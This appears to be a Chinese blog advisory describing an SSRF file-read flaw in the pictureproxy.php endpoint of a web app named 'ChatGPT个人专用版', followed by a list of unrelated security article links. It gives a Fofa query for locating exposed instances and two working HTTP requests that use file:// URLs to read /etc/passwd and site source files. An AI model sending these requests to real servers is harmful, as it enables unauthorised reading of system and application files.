ChatGPT个人专用版 pictureproxy.php SSRF漏洞

0x01 漏洞描述:

ChatGPT个人专用版是一种基于人工智能的对话系统,旨在为用户提供个性化的交流体验。它能够理解和生成自然语言,帮助用户解决问题、获取信息或进行创意交流。通过不断学习和优化,ChatGPT个人专用版可以更好地适应用户的需求和偏好,提供更为精准和贴心的服务。其接口pictureproxy.php存在SSRF漏洞,攻击者可通过该漏洞获取系统敏感文件信息。

0x02 搜索语句:

Fofa:title="ChatGPT个人专用版"

0x03 漏洞复现:

宝塔服务网站:

复制代码
GET /pictureproxy.php?url=file:www/wwwroot/网站路径/pictureproxy.php HTTP/1.1
Host:your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887 Safari/532.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Connection: close

linux服务网站

复制代码
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887 Safari/532.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Connection: close

0x04 修复建议:

官方已更新补丁,请即时修复。

相关推荐
Andya_net9 小时前
网络安全 | 深入了解OAuth 2.0原理
安全·web安全·github
半个西瓜.10 小时前
车联网安全:调试接口安全测试.
网络·安全·web安全·网络安全·车载系统
黄焖鸡能干四碗15 小时前
网络安全态势报告,网络安全风险评估报告文档
大数据·网络·安全·web安全·信息可视化·需求分析
huangwxiao1 天前
ATT&CK红队评估一
web安全·内网安全·红日靶场
上海云盾安全满满1 天前
支付网站屡遭CC攻击,高防ip能防CC攻击吗
tcp/ip·安全·web安全
东方隐侠安全团队-千里1 天前
第13节 93年高能所被入侵,开启中国网络安全发展进程
网络·安全·web安全
belldeep1 天前
网络安全:SQL 注入:SQLmap
web安全·sql注入·sqlmap
P***25391 天前
免费的Web安全漏洞扫描,工具
安全·web安全
y***54882 天前
免费的Web安全测试工具,可以替代Burp Suite
安全·web安全
2301_780789662 天前
WAF如何应对金融领域的网络威胁和黑客攻击
服务器·网络·安全·web安全·金融